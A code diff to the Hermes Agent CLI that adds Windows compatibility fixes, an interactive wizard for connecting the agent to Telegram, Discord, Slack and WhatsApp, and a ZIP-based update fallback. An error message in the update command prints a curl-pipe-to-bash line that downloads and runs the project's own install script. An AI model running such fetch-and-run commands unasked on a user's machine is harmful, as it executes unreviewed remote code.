+    # On Windows, open() defaults to the system locale (cp1252) which can
+    # cause OSError errno 22 on UTF-8 .env files.
+    read_kw = {"encoding": "utf-8", "errors": "replace"} if _IS_WINDOWS else {}
+    write_kw = {"encoding": "utf-8"} if _IS_WINDOWS else {}
+
    lines = []
    if env_path.exists():
-        with open(env_path) as f:
+        with open(env_path, **read_kw) as f:
            lines = f.readlines()
    
    # Find and update or append
@@ -653,7 +668,7 @@ def save_env_value(key: str, value: str):
            lines[-1] += "\n"
        lines.append(f"{key}={value}\n")
    
-    with open(env_path, 'w') as f:
+    with open(env_path, 'w', **write_kw) as f:
        f.writelines(lines)


--- a/hermes_cli/gateway.py
+++ b/hermes_cli/gateway.py
@@ -1,7 +1,7 @@
 """
 Gateway subcommand for hermes CLI.

-Handles: hermes gateway [run|start|stop|restart|status|install|uninstall]
+Handles: hermes gateway [run|start|stop|restart|status|install|uninstall|setup]
 """

 import asyncio
@@ -13,6 +13,13 @@ from pathlib import Path

 PROJECT_ROOT = Path(__file__).parent.parent.resolve()

+from hermes_cli.config import get_env_value, save_env_value
+from hermes_cli.setup import (
+    print_header, print_info, print_success, print_warning, print_error,
+    prompt, prompt_choice, prompt_yes_no,
+)
+from hermes_cli.colors import Colors, color
+

 # =============================================================================
 # Process Management (for manual gateway runs)
@@ -21,39 +28,59 @@ PROJECT_ROOT = Path(__file__).parent.parent.resolve()
 def find_gateway_pids() -> list:
    """Find PIDs of running gateway processes."""
    pids = []
+    patterns = [
+        "hermes_cli.main gateway",
+        "hermes gateway",
+        "gateway/run.py",
+    ]
+
    try:
-        # Look for gateway processes with multiple patterns
-        patterns = [
-            "hermes_cli.main gateway",
-            "hermes gateway",
-            "gateway/run.py",
-        ]
-        
-        result = subprocess.run(
-            ["ps", "aux"],
-            capture_output=True,
-            text=True
-        )
-        
-        for line in result.stdout.split('\n'):
-            # Skip grep and current process
-            if 'grep' in line or str(os.getpid()) in line:
-                continue
-            
-            for pattern in patterns:
-                if pattern in line:
-                    parts = line.split()
-                    if len(parts) > 1:
+        if is_windows():
+            # Windows: use wmic to search command lines
+            result = subprocess.run(
+                ["wmic", "process", "get", "ProcessId,CommandLine", "/FORMAT:LIST"],
+                capture_output=True, text=True
+            )
+            # Parse WMIC LIST output: blocks of "CommandLine=...\nProcessId=...\n"
+            current_cmd = ""
+            for line in result.stdout.split('\n'):
+                line = line.strip()
+                if line.startswith("CommandLine="):
+                    current_cmd = line[len("CommandLine="):]
+                elif line.startswith("ProcessId="):
+                    pid_str = line[len("ProcessId="):]
+                    if any(p in current_cmd for p in patterns):
                        try:
-                            pid = int(parts[1])
-                            if pid not in pids:
+                            pid = int(pid_str)
+                            if pid != os.getpid() and pid not in pids:
                                pids.append(pid)
                        except ValueError:
-                            continue
-                    break
+                            pass
+                    current_cmd = ""
+        else:
+            result = subprocess.run(
+                ["ps", "aux"],
+                capture_output=True,
+                text=True
+            )
+            for line in result.stdout.split('\n'):
+                # Skip grep and current process
+                if 'grep' in line or str(os.getpid()) in line:
+                    continue
+                for pattern in patterns:
+                    if pattern in line:
+                        parts = line.split()
+                        if len(parts) > 1:
+                            try:
+                                pid = int(parts[1])
+                                if pid not in pids:
+                                    pids.append(pid)
+                            except ValueError:
+                                continue
+                        break
    except Exception:
        pass
-    
+
    return pids


@@ -64,7 +91,7 @@ def kill_gateway_processes(force: bool = False) -> int:
    
    for pid in pids:
        try:
-            if force:
+            if force and not is_windows():
                os.kill(pid, signal.SIGKILL)
            else:
                os.kill(pid, signal.SIGTERM)
@@ -102,7 +129,10 @@ def get_launchd_plist_path() -> Path:
    return Path.home() / "Library" / "LaunchAgents" / "ai.hermes.gateway.plist"

 def get_python_path() -> str:
-    venv_python = PROJECT_ROOT / "venv" / "bin" / "python"
+    if is_windows():
+        venv_python = PROJECT_ROOT / "venv" / "Scripts" / "python.exe"
+    else:
+        venv_python = PROJECT_ROOT / "venv" / "bin" / "python"
    if venv_python.exists():
        return str(venv_python)
    return sys.executable
@@ -368,6 +398,362 @@ def run_gateway(verbose: bool = False):
        sys.exit(1)


+# =============================================================================
+# Gateway Setup (Interactive Messaging Platform Configuration)
+# =============================================================================
+
+# Per-platform config: each entry defines the env vars, setup instructions,
+# and prompts needed to configure a messaging platform.
+_PLATFORMS = [
+    {
+        "key": "telegram",
+        "label": "Telegram",
+        "emoji": "📱",
+        "token_var": "TELEGRAM_BOT_TOKEN",
+        "setup_instructions": [
+            "1. Open Telegram and message @BotFather",
+            "2. Send /newbot and follow the prompts to create your bot",
+            "3. Copy the bot token BotFather gives you",
+            "4. To find your user ID: message @userinfobot — it replies with your numeric ID",
+        ],
+        "vars": [
+            {"name": "TELEGRAM_BOT_TOKEN", "prompt": "Bot token", "password": True,
+             "help": "Paste the token from @BotFather (step 3 above)."},
+            {"name": "TELEGRAM_ALLOWED_USERS", "prompt": "Allowed user IDs (comma-separated)", "password": False,
+             "is_allowlist": True,
+             "help": "Paste your user ID from step 4 above."},
+            {"name": "TELEGRAM_HOME_CHANNEL", "prompt": "Home channel ID (for cron/notification delivery, or empty to set later with /set-home)", "password": False,
+             "help": "For DMs, this is your user ID. You can set it later by typing /set-home in chat."},
+        ],
+    },
+    {
+        "key": "discord",
+        "label": "Discord",
+        "emoji": "💬",
+        "token_var": "DISCORD_BOT_TOKEN",
+        "setup_instructions": [
+            "1. Go to https://discord.com/developers/applications → New Application",
+            "2. Go to Bot → Reset Token → copy the bot token",
+            "3. Enable: Bot → Privileged Gateway Intents → Message Content Intent",
+            "4. Invite the bot to your server:",
+            "   OAuth2 → URL Generator → check BOTH scopes:",
+            "     - bot",
+            "     - applications.commands  (required for slash commands!)",
+            "   Bot Permissions: Send Messages, Read Message History, Attach Files",
+            "   Copy the URL and open it in your browser to invite.",
+            "5. Get your user ID: enable Developer Mode in Discord settings,",
+            "   then right-click your name → Copy ID",
+        ],
+        "vars": [
+            {"name": "DISCORD_BOT_TOKEN", "prompt": "Bot token", "password": True,
+             "help": "Paste the token from step 2 above."},
+            {"name": "DISCORD_ALLOWED_USERS", "prompt": "Allowed user IDs or usernames (comma-separated)", "password": False,
+             "is_allowlist": True,
+             "help": "Paste your user ID from step 5 above."},
+            {"name": "DISCORD_HOME_CHANNEL", "prompt": "Home channel ID (for cron/notification delivery, or empty to set later with /set-home)", "password": False,
+             "help": "Right-click a channel → Copy Channel ID (requires Developer Mode)."},
+        ],
+    },
+    {
+        "key": "slack",
+        "label": "Slack",
+        "emoji": "💼",
+        "token_var": "SLACK_BOT_TOKEN",
+        "setup_instructions": [
+            "1. Go to https://api.slack.com/apps → Create New App → From Scratch",
+            "2. Enable Socket Mode: App Settings → Socket Mode → Enable",
+            "3. Get Bot Token: OAuth & Permissions → Install to Workspace → copy xoxb-... token",
+            "4. Get App Token: Basic Information → App-Level Tokens → Generate",
+            "   Name it anything, add scope: connections:write → copy xapp-... token",
+            "5. Add bot scopes: OAuth & Permissions → Scopes → chat:write, im:history,",
+            "   im:read, im:write, channels:history, channels:read",
+            "6. Reinstall the app to your workspace after adding scopes",
+            "7. Find your user ID: click your profile → three dots → Copy member ID",
+        ],
+        "vars": [
+            {"name": "SLACK_BOT_TOKEN", "prompt": "Bot Token (xoxb-...)", "password": True,
+             "help": "Paste the bot token from step 3 above."},
+            {"name": "SLACK_APP_TOKEN", "prompt": "App Token (xapp-...)", "password": True,
+             "help": "Paste the app-level token from step 4 above."},
+            {"name": "SLACK_ALLOWED_USERS", "prompt": "Allowed user IDs (comma-separated)", "password": False,
+             "is_allowlist": True,
+             "help": "Paste your member ID from step 7 above."},
+        ],
+    },
+    {
+        "key": "whatsapp",
+        "label": "WhatsApp",
+        "emoji": "📲",
+        "token_var": "WHATSAPP_ENABLED",
+    },
+]
+
+
+def _platform_status(platform: dict) -> str:
+    """Return a plain-text status string for a platform.
+
+    Returns uncolored text so it can safely be embedded in
+    simple_term_menu items (ANSI codes break width calculation).
+    """
+    token_var = platform["token_var"]
+    val = get_env_value(token_var)
+    if token_var == "WHATSAPP_ENABLED":
+        if val and val.lower() == "true":
+            session_file = Path.home() / ".hermes" / "whatsapp" / "session" / "creds.json"
+            if session_file.exists():
+                return "configured + paired"
+            return "enabled, not paired"
+        return "not configured"
+    if val:
+        return "configured"
+    return "not configured"
+
+
+def _setup_standard_platform(platform: dict):
+    """Interactive setup for Telegram, Discord, or Slack."""
+    emoji = platform["emoji"]
+    label = platform["label"]
+    token_var = platform["token_var"]
+
+    print()
+    print(color(f"  ─── {emoji} {label} Setup ───", Colors.CYAN))
+
+    # Show step-by-step setup instructions if this platform has them
+    instructions = platform.get("setup_instructions")
+    if instructions:
+        print()
+        for line in instructions:
+            print_info(f"  {line}")
+
+    existing_token = get_env_value(token_var)
+    if existing_token:
+        print()
+        print_success(f"{label} is already configured.")
+        if not prompt_yes_no(f"  Reconfigure {label}?", False):
+            return
+
+    allowed_val_set = None  # Track if user set an allowlist (for home channel offer)
+
+    for var in platform["vars"]:
+        print()
+        print_info(f"  {var['help']}")
+        existing = get_env_value(var["name"])
+        if existing and var["name"] != token_var:
+            print_info(f"  Current: {existing}")
+
+        # Allowlist fields get special handling for the deny-by-default security model
+        if var.get("is_allowlist"):
+            print_info(f"  The gateway DENIES all users by default for security.")
+            print_info(f"  Enter user IDs to create an allowlist, or leave empty")
+            print_info(f"  and you'll be asked about open access next.")
+            value = prompt(f"  {var['prompt']}", password=False)
+            if value:
+                cleaned = value.replace(" ", "")
+                save_env_value(var["name"], cleaned)
+                print_success(f"  Saved — only these users can interact with the bot.")
+                allowed_val_set = cleaned
+            else:
+                # No allowlist — ask about open access vs DM pairing
+                print()
+                access_choices = [
+                    "Enable open access (anyone can message the bot)",
+                    "Use DM pairing (unknown users request access, you approve with 'hermes pairing approve')",
+                    "Skip for now (bot will deny all users until configured)",
+                ]
+                access_idx = prompt_choice("  How should unauthorized users be handled?", access_choices, 1)
+                if access_idx == 0:
+                    save_env_value("GATEWAY_ALLOW_ALL_USERS", "true")
+                    print_warning("  Open access enabled — anyone can use your bot!")
+                elif access_idx == 1:
+                    print_success("  DM pairing mode — users will receive a code to request access.")
+                    print_info("  Approve with: hermes pairing approve {platform} {code}")
+                else:
+                    print_info("  Skipped — configure later with 'hermes gateway setup'")
+            continue
+
+        value = prompt(f"  {var['prompt']}", password=var.get("password", False))
+        if value:
+            save_env_value(var["name"], value)
+            print_success(f"  Saved {var['name']}")
+        elif var["name"] == token_var:
+            print_warning(f"  Skipped — {label} won't work without this.")
+            return
+        else:
+            print_info(f"  Skipped (can configure later)")
+
+    # If an allowlist was set and home channel wasn't, offer to reuse
+    # the first user ID (common for Telegram DMs).
+    home_var = f"{label.upper()}_HOME_CHANNEL"
+    home_val = get_env_value(home_var)
+    if allowed_val_set and not home_val and label == "Telegram":
+        first_id = allowed_val_set.split(",")[0].strip()
+        if first_id and prompt_yes_no(f"  Use your user ID ({first_id}) as the home channel?", True):
+            save_env_value(home_var, first_id)
+            print_success(f"  Home channel set to {first_id}")
+
+    print()
+    print_success(f"{emoji} {label} configured!")
+
+
+def _setup_whatsapp():
+    """Delegate to the existing WhatsApp setup flow."""
+    from hermes_cli.main import cmd_whatsapp
+    import argparse
+    cmd_whatsapp(argparse.Namespace())
+
+
+def _is_service_installed() -> bool:
+    """Check if the gateway is installed as a system service."""
+    if is_linux():
+        return get_systemd_unit_path().exists()
+    elif is_macos():
+        return get_launchd_plist_path().exists()
+    return False
+
+
+def _is_service_running() -> bool:
+    """Check if the gateway service is currently running."""
+    if is_linux() and get_systemd_unit_path().exists():
+        result = subprocess.run(
+            ["systemctl", "--user", "is-active", SERVICE_NAME],
+            capture_output=True, text=True
+        )
+        return result.stdout.strip() == "active"
+    elif is_macos() and get_launchd_plist_path().exists():
+        result = subprocess.run(
+            ["launchctl", "list", "ai.hermes.gateway"],
+            capture_output=True, text=True
+        )
+        return result.returncode == 0
+    # Check for manual processes
+    return len(find_gateway_pids()) > 0
+
+
+def gateway_setup():
+    """Interactive setup for messaging platforms + gateway service."""
+
+    print()
+    print(color("┌─────────────────────────────────────────────────────────┐", Colors.MAGENTA))
+    print(color("│             ⚕ Gateway Setup                            │", Colors.MAGENTA))
+    print(color("├─────────────────────────────────────────────────────────┤", Colors.MAGENTA))
+    print(color("│  Configure messaging platforms and the gateway service. │", Colors.MAGENTA))
+    print(color("│  Press Ctrl+C at any time to exit.                     │", Colors.MAGENTA))
+    print(color("└─────────────────────────────────────────────────────────┘", Colors.MAGENTA))
+
+    # ── Gateway service status ──
+    print()
+    service_installed = _is_service_installed()
+    service_running = _is_service_running()
+
+    if service_installed and service_running:
+        print_success("Gateway service is installed and running.")
+    elif service_installed:
+        print_warning("Gateway service is installed but not running.")
+        if prompt_yes_no("  Start it now?", True):
+            try:
+                if is_linux():
+                    systemd_start()
+                elif is_macos():
+                    launchd_start()
+            except subprocess.CalledProcessError as e:
+                print_error(f"  Failed to start: {e}")
+    else:
+        print_info("Gateway service is not installed yet.")
+        print_info("You'll be offered to install it after configuring platforms.")
+
+    # ── Platform configuration loop ──
+    while True:
+        print()
+        print_header("Messaging Platforms")
+
+        menu_items = []
+        for plat in _PLATFORMS:
+            status = _platform_status(plat)
+            menu_items.append(f"{plat['label']}  ({status})")
+        menu_items.append("Done")
+
+        choice = prompt_choice("Select a platform to configure:", menu_items, len(menu_items) - 1)
+
+        if choice == len(_PLATFORMS):
+            break
+
+        platform = _PLATFORMS[choice]
+
+        if platform["key"] == "whatsapp":
+            _setup_whatsapp()
+        else:
+            _setup_standard_platform(platform)
+
+    # ── Post-setup: offer to install/restart gateway ──
+    any_configured = any(
+        bool(get_env_value(p["token_var"]))
+        for p in _PLATFORMS
+        if p["key"] != "whatsapp"
+    ) or (get_env_value("WHATSAPP_ENABLED") or "").lower() == "true"
+
+    if any_configured:
+        print()
+        print(color("─" * 58, Colors.DIM))
+        service_installed = _is_service_installed()
+        service_running = _is_service_running()
+
+        if service_running:
+            if prompt_yes_no("  Restart the gateway to pick up changes?", True):
+                try:
+                    if is_linux():
+                        systemd_restart()
+                    elif is_macos():
+                        launchd_restart()
+                    else:
+                        kill_gateway_processes()
+                        print_info("Start manually: hermes gateway")
+                except subprocess.CalledProcessError as e:
+                    print_error(f"  Restart failed: {e}")
+        elif service_installed:
+            if prompt_yes_no("  Start the gateway service?", True):
+                try:
+                    if is_linux():
+                        systemd_start()
+                    elif is_macos():
+                        launchd_start()
+                except subprocess.CalledProcessError as e:
+                    print_error(f"  Start failed: {e}")
+        else:
+            print()
+            if is_linux() or is_macos():
+                platform_name = "systemd" if is_linux() else "launchd"
+                if prompt_yes_no(f"  Install the gateway as a {platform_name} service? (runs in background, starts on boot)", True):
+                    try:
+                        force = False
+                        if is_linux():
+                            systemd_install(force)
+                        else:
+                            launchd_install(force)
+                        print()
+                        if prompt_yes_no("  Start the service now?", True):
+                            try:
+                                if is_linux():
+                                    systemd_start()
+                                else:
+                                    launchd_start()
+                            except subprocess.CalledProcessError as e:
+                                print_error(f"  Start failed: {e}")
+                    except subprocess.CalledProcessError as e:
+                        print_error(f"  Install failed: {e}")
+                        print_info("  You can try manually: hermes gateway install")
+                else:
+                    print_info("  You can install later: hermes gateway install")
+                    print_info("  Or run in foreground:  hermes gateway")
+            else:
+                print_info("  Service install not supported on this platform.")
+                print_info("  Run in foreground: hermes gateway")
+    else:
+        print()
+        print_info("No platforms configured. Run 'hermes gateway setup' when ready.")
+
+    print()
+
+
 # =============================================================================
 # Main Command Handler
 # =============================================================================
@@ -381,7 +767,11 @@ def gateway_command(args):
        verbose = getattr(args, 'verbose', False)
        run_gateway(verbose)
        return
-    
+
+    if subcmd == "setup":
+        gateway_setup()
+        return
+
    # Service management commands
    if subcmd == "install":
        force = getattr(args, 'force', False)
--- a/hermes_cli/main.py
+++ b/hermes_cli/main.py
@@ -168,7 +168,7 @@ def cmd_gateway(args):


 def cmd_whatsapp(args):
-    """Set up WhatsApp: enable, configure allowed users, install bridge, pair via QR."""
+    """Set up WhatsApp: choose mode, configure, install bridge, pair via QR."""
    import os
    import subprocess
    from pathlib import Path
@@ -177,12 +177,55 @@ def cmd_whatsapp(args):
    print()
    print("⚕ WhatsApp Setup")
    print("=" * 50)
-    print()
-    print("This will link your WhatsApp account to Hermes Agent.")
-    print("The agent will respond to messages sent to your WhatsApp number.")
-    print()

-    # Step 1: Enable WhatsApp
+    # ── Step 1: Choose mode ──────────────────────────────────────────────
+    current_mode = get_env_value("WHATSAPP_MODE") or ""
+    if not current_mode:
+        print()
+        print("How will you use WhatsApp with Hermes?")
+        print()
+        print("  1. Separate bot number (recommended)")
+        print("     People message the bot's number directly — cleanest experience.")
+        print("     Requires a second phone number with WhatsApp installed on a device.")
+        print()
+        print("  2. Personal number (self-chat)")
+        print("     You message yourself to talk to the agent.")
+        print("     Quick to set up, but the UX is less intuitive.")
+        print()
+        try:
+            choice = input("  Choose [1/2]: ").strip()
+        except (EOFError, KeyboardInterrupt):
+            print("\nSetup cancelled.")
+            return
+
+        if choice == "1":
+            save_env_value("WHATSAPP_MODE", "bot")
+            wa_mode = "bot"
+            print("  ✓ Mode: separate bot number")
+            print()
+            print("  ┌─────────────────────────────────────────────────┐")
+            print("  │  Getting a second number for the bot:           │")
+            print("  │                                                 │")
+            print("  │  Easiest: Install WhatsApp Business (free app)  │")
+            print("  │  on your phone with a second number:            │")
+            print("  │    • Dual-SIM: use your 2nd SIM slot            │")
+            print("  │    • Google Voice: free US number (voice.google) │")
+            print("  │    • Prepaid SIM: $3-10, verify once            │")
+            print("  │                                                 │")
+            print("  │  WhatsApp Business runs alongside your personal │")
+            print("  │  WhatsApp — no second phone needed.             │")
+            print("  └─────────────────────────────────────────────────┘")
+        else:
+            save_env_value("WHATSAPP_MODE", "self-chat")
+            wa_mode = "self-chat"
+            print("  ✓ Mode: personal number (self-chat)")
+    else:
+        wa_mode = current_mode
+        mode_label = "separate bot number" if wa_mode == "bot" else "personal number (self-chat)"
+        print(f"\n✓ Mode: {mode_label}")
+
+    # ── Step 2: Enable WhatsApp ──────────────────────────────────────────
+    print()
    current = get_env_value("WHATSAPP_ENABLED")
    if current and current.lower() == "true":
        print("✓ WhatsApp is already enabled")
@@ -190,26 +233,36 @@ def cmd_whatsapp(args):
        save_env_value("WHATSAPP_ENABLED", "true")
        print("✓ WhatsApp enabled")

-    # Step 2: Allowed users
+    # ── Step 3: Allowed users ────────────────────────────────────────────
    current_users = get_env_value("WHATSAPP_ALLOWED_USERS") or ""
    if current_users:
        print(f"✓ Allowed users: {current_users}")
-        response = input("\n  Update allowed users? [y/N] ").strip()
+        try:
+            response = input("\n  Update allowed users? [y/N] ").strip()
+        except (EOFError, KeyboardInterrupt):
+            response = "n"
        if response.lower() in ("y", "yes"):
-            phone = input("  Phone number(s) (e.g. 15551234567, comma-separated): ").strip()
+            if wa_mode == "bot":
+                phone = input("  Phone numbers that can message the bot (comma-separated): ").strip()
+            else:
+                phone = input("  Your phone number (e.g. 15551234567): ").strip()
            if phone:
                save_env_value("WHATSAPP_ALLOWED_USERS", phone.replace(" ", ""))
                print(f"  ✓ Updated to: {phone}")
    else:
        print()
-        phone = input("  Your phone number (e.g. 15551234567): ").strip()
+        if wa_mode == "bot":
+            print("  Who should be allowed to message the bot?")
+            phone = input("  Phone numbers (comma-separated, or * for anyone): ").strip()
+        else:
+            phone = input("  Your phone number (e.g. 15551234567): ").strip()
        if phone:
            save_env_value("WHATSAPP_ALLOWED_USERS", phone.replace(" ", ""))
            print(f"  ✓ Allowed users set: {phone}")
        else:
            print("  ⚠ No allowlist — the agent will respond to ALL incoming messages")

-    # Step 3: Install bridge deps
+    # ── Step 4: Install bridge dependencies ──────────────────────────────
    project_root = Path(__file__).resolve().parents[1]
    bridge_dir = project_root / "scripts" / "whatsapp-bridge"
    bridge_script = bridge_dir / "bridge.js"
@@ -234,13 +287,16 @@ def cmd_whatsapp(args):
    else:
        print("✓ Bridge dependencies already installed")

-    # Step 4: Check for existing session
+    # ── Step 5: Check for existing session ───────────────────────────────
    session_dir = Path.home() / ".hermes" / "whatsapp" / "session"
    session_dir.mkdir(parents=True, exist_ok=True)

    if (session_dir / "creds.json").exists():
        print("✓ Existing WhatsApp session found")
-        response = input("\n  Re-pair? This will clear the existing session. [y/N] ").strip()
+        try:
+            response = input("\n  Re-pair? This will clear the existing session. [y/N] ").strip()
+        except (EOFError, KeyboardInterrupt):
+            response = "n"
        if response.lower() in ("y", "yes"):
            import shutil
            shutil.rmtree(session_dir, ignore_errors=True)
@@ -251,11 +307,16 @@ def cmd_whatsapp(args):
            print("  Start the gateway with: hermes gateway")
            return

-    # Step 5: Run bridge in pair-only mode (no HTTP server, exits after QR scan)
+    # ── Step 6: QR code pairing ──────────────────────────────────────────
    print()
    print("─" * 50)
-    print("📱 Scan the QR code with your phone:")
-    print("   WhatsApp → Settings → Linked Devices → Link a Device")
+    if wa_mode == "bot":
+        print("📱 Open WhatsApp (or WhatsApp Business) on the")
+        print("   phone with the BOT's number, then scan:")
+    else:
+        print("📱 Open WhatsApp on your phone, then scan:")
+    print()
+    print("   Settings → Linked Devices → Link a Device")
    print("─" * 50)
    print()

@@ -267,12 +328,28 @@ def cmd_whatsapp(args):
    except KeyboardInterrupt:
        pass

+    # ── Step 7: Post-pairing ─────────────────────────────────────────────
    print()
    if (session_dir / "creds.json").exists():
        print("✓ WhatsApp paired successfully!")
        print()
-        print("Start the gateway with: hermes gateway")
-        print("Or install as a service: hermes gateway install")
+        if wa_mode == "bot":
+            print("  Next steps:")
+            print("    1. Start the gateway:  hermes gateway")
+            print("    2. Send a message to the bot's WhatsApp number")
+            print("    3. The agent will reply automatically")
+            print()
+            print("  Tip: Agent responses are prefixed with '⚕ Hermes Agent'")
+        else:
+            print("  Next steps:")
+            print("    1. Start the gateway:  hermes gateway")
+            print("    2. Open WhatsApp → Message Yourself")
+            print("    3. Type a message — the agent will reply")
+            print()
+            print("  Tip: Agent responses are prefixed with '⚕ Hermes Agent'")
+            print("  so you can tell them apart from your own messages.")
+        print()
+        print("  Or install as a service: hermes gateway install")
    else:
        print("⚠ Pairing may not have completed. Run 'hermes whatsapp' to try again.")

@@ -697,6 +774,96 @@ def cmd_uninstall(args):
    run_uninstall(args)


+def _update_via_zip(args):
+    """Update Hermes Agent by downloading a ZIP archive.
+    
+    Used on Windows when git file I/O is broken (antivirus, NTFS filter 
+    drivers causing 'Invalid argument' errors on file creation).
+    """
+    import shutil
+    import tempfile
+    import zipfile
+    from urllib.request import urlretrieve
+    
+    branch = "main"
+    zip_url = f"https://github.com/NousResearch/hermes-agent/archive/refs/heads/{branch}.zip"
+    
+    print("→ Downloading latest version...")
+    try:
+        tmp_dir = tempfile.mkdtemp(prefix="hermes-update-")
+        zip_path = os.path.join(tmp_dir, f"hermes-agent-{branch}.zip")
+        urlretrieve(zip_url, zip_path)
+        
+        print("→ Extracting...")
+        with zipfile.ZipFile(zip_path, 'r') as zf:
+            zf.extractall(tmp_dir)
+        
+        # GitHub ZIPs extract to hermes-agent-<branch>/
+        extracted = os.path.join(tmp_dir, f"hermes-agent-{branch}")
+        if not os.path.isdir(extracted):
+            # Try to find it
+            for d in os.listdir(tmp_dir):
+                candidate = os.path.join(tmp_dir, d)
+                if os.path.isdir(candidate) and d != "__MACOSX":
+                    extracted = candidate
+                    break
+        
+        # Copy updated files over existing installation, preserving venv/node_modules/.git
+        preserve = {'venv', 'node_modules', '.git', '__pycache__', '.env'}
+        update_count = 0
+        for item in os.listdir(extracted):
+            if item in preserve:
+                continue
+            src = os.path.join(extracted, item)
+            dst = os.path.join(str(PROJECT_ROOT), item)
+            if os.path.isdir(src):
+                if os.path.exists(dst):
+                    shutil.rmtree(dst)
+                shutil.copytree(src, dst)
+            else:
+                shutil.copy2(src, dst)
+            update_count += 1
+        
+        print(f"✓ Updated {update_count} items from ZIP")
+        
+        # Cleanup
+        shutil.rmtree(tmp_dir, ignore_errors=True)
+        
+    except Exception as e:
+        print(f"✗ ZIP update failed: {e}")
+        sys.exit(1)
+    
+    # Reinstall Python dependencies
+    print("→ Updating Python dependencies...")
+    import subprocess
+    uv_bin = shutil.which("uv")
+    if uv_bin:
+        subprocess.run(
+            [uv_bin, "pip", "install", "-e", ".", "--quiet"],
+            cwd=PROJECT_ROOT, check=True,
+            env={**os.environ, "VIRTUAL_ENV": str(PROJECT_ROOT / "venv")}
+        )
+    else:
+        venv_pip = PROJECT_ROOT / "venv" / ("Scripts" if sys.platform == "win32" else "bin") / "pip"
+        if venv_pip.exists():
+            subprocess.run([str(venv_pip), "install", "-e", ".", "--quiet"], cwd=PROJECT_ROOT, check=True)
+    
+    # Sync skills
+    try:
+        from tools.skills_sync import sync_skills
+        print("→ Checking for new bundled skills...")
+        result = sync_skills(quiet=True)
+        if result["copied"]:
+            print(f"  + {len(result['copied'])} new skill(s): {', '.join(result['copied'])}")
+        else:
+            print("  ✓ Skills are up to date")
+    except Exception:
+        pass
+    
+    print()
+    print("✓ Update complete!")
+
+
 def cmd_update(args):
    """Update Hermes Agent to the latest version."""
    import subprocess
@@ -705,21 +872,44 @@ def cmd_update(args):
    print("⚕ Updating Hermes Agent...")
    print()
    
-    # Check if we're in a git repo
+    # Try git-based update first, fall back to ZIP download on Windows
+    # when git file I/O is broken (antivirus, NTFS filter drivers, etc.)
+    use_zip_update = False
    git_dir = PROJECT_ROOT / '.git'
-    if not git_dir.exists():
-        print("✗ Not a git repository. Please reinstall:")
-        print("  curl -fsSL https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scripts/install.sh | bash")
-        sys.exit(1)
    
+    if not git_dir.exists():
+        if sys.platform == "win32":
+            use_zip_update = True
+        else:
+            print("✗ Not a git repository. Please reinstall:")
+            print("  curl -fsSL https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scripts/install.sh | bash")
+            sys.exit(1)
+    
+    # On Windows, git can fail with "unable to write loose object file: Invalid argument"
+    # due to filesystem atomicity issues. Set the recommended workaround.
+    if sys.platform == "win32" and git_dir.exists():
+        subprocess.run(
+            ["git", "-c", "windows.appendAtomically=false", "config", "windows.appendAtomically", "false"],
+            cwd=PROJECT_ROOT, check=False, capture_output=True
+        )
+
+    if use_zip_update:
+        # ZIP-based update for Windows when git is broken
+        _update_via_zip(args)
+        return
+
    # Fetch and pull
    try:
        print("→ Fetching updates...")
-        subprocess.run(["git", "fetch", "origin"], cwd=PROJECT_ROOT, check=True)
+        git_cmd = ["git"]
+        if sys.platform == "win32":
+            git_cmd = ["git", "-c", "windows.appendAtomically=false"]
+        
+        subprocess.run(git_cmd + ["fetch", "origin"], cwd=PROJECT_ROOT, check=True)
        
        # Get current branch
        result = subprocess.run(
-            ["git", "rev-parse", "--abbrev-ref", "HEAD"],
+            git_cmd + ["rev-parse", "--abbrev-ref", "HEAD"],
            cwd=PROJECT_ROOT,
            capture_output=True,
            text=True,
@@ -729,7 +919,7 @@ def cmd_update(args):
        
        # Check if there are updates
        result = subprocess.run(
-            ["git", "rev-list", f"HEAD..origin/{branch}", "--count"],
+            git_cmd + ["rev-list", f"HEAD..origin/{branch}", "--count"],
            cwd=PROJECT_ROOT,
            capture_output=True,
            text=True,
@@ -743,7 +933,7 @@ def cmd_update(args):
        
        print(f"→ Found {commit_count} new commit(s)")
        print("→ Pulling updates...")
-        subprocess.run(["git", "pull", "origin", branch], cwd=PROJECT_ROOT, check=True)
+        subprocess.run(git_cmd + ["pull", "origin", branch], cwd=PROJECT_ROOT, check=True)
        
        # Reinstall Python dependencies (prefer uv for speed, fall back to pip)
        print("→ Updating Python dependencies...")
@@ -755,7 +945,7 @@ def cmd_update(args):
                env={**os.environ, "VIRTUAL_ENV": str(PROJECT_ROOT / "venv")}
            )
        else:
-            venv_pip = PROJECT_ROOT / "venv" / "bin" / "pip"
+            venv_pip = PROJECT_ROOT / "venv" / ("Scripts" if sys.platform == "win32" else "bin") / "pip"
            if venv_pip.exists():
                subprocess.run([str(venv_pip), "install", "-e", ".", "--quiet"], cwd=PROJECT_ROOT, check=True)
            else:
@@ -851,8 +1041,14 @@ def cmd_update(args):
        print("  hermes model              # Select provider and model")
        
    except subprocess.CalledProcessError as e:
-        print(f"✗ Update failed: {e}")
-        sys.exit(1)
+        if sys.platform == "win32":
+            print(f"⚠ Git update failed: {e}")
+            print("→ Falling back to ZIP download...")
+            print()
+            _update_via_zip(args)
+        else:
+            print(f"✗ Update failed: {e}")
+            sys.exit(1)


 def main():
@@ -992,7 +1188,10 @@ For more help on a command:
    
    # gateway uninstall
    gateway_uninstall = gateway_subparsers.add_parser("uninstall", help="Uninstall gateway service")
-    
+
+    # gateway setup
+    gateway_setup = gateway_subparsers.add_parser("setup", help="Configure messaging platforms")
+
    gateway_parser.set_defaults(func=cmd_gateway)
    
    # =========================================================================
--- a/hermes_cli/runtime_provider.py
+++ b/hermes_cli/runtime_provider.py
@@ -74,8 +74,8 @@ def _resolve_openrouter_runtime(

    api_key = (
        explicit_api_key
-        or os.getenv("OPENAI_API_KEY")
        or os.getenv("OPENROUTER_API_KEY")
+        or os.getenv("OPENAI_API_KEY")
        or ""
    )

--- a/hermes_cli/setup.py
+++ b/hermes_cli/setup.py
@@ -78,9 +78,15 @@ def prompt_choice(question: str, choices: list, default: int = 0) -> int:
    # Try to use interactive menu if available
    try:
        from simple_term_menu import TerminalMenu
+        import re
        
-        # Add visual indicators
-        menu_choices = [f"  {choice}" for choice in choices]
+        # Strip emoji characters — simple_term_menu miscalculates visual
+        # width of emojis, causing duplicated/garbled lines on redraw.
+        _emoji_re = re.compile(
+            "[\U0001f300-\U0001f9ff\U00002600-\U000027bf\U0000fe00-\U0000fe0f"
+            "\U0001fa00-\U0001fa6f\U0001fa70-\U0001faff\u200d]+", flags=re.UNICODE
+        )
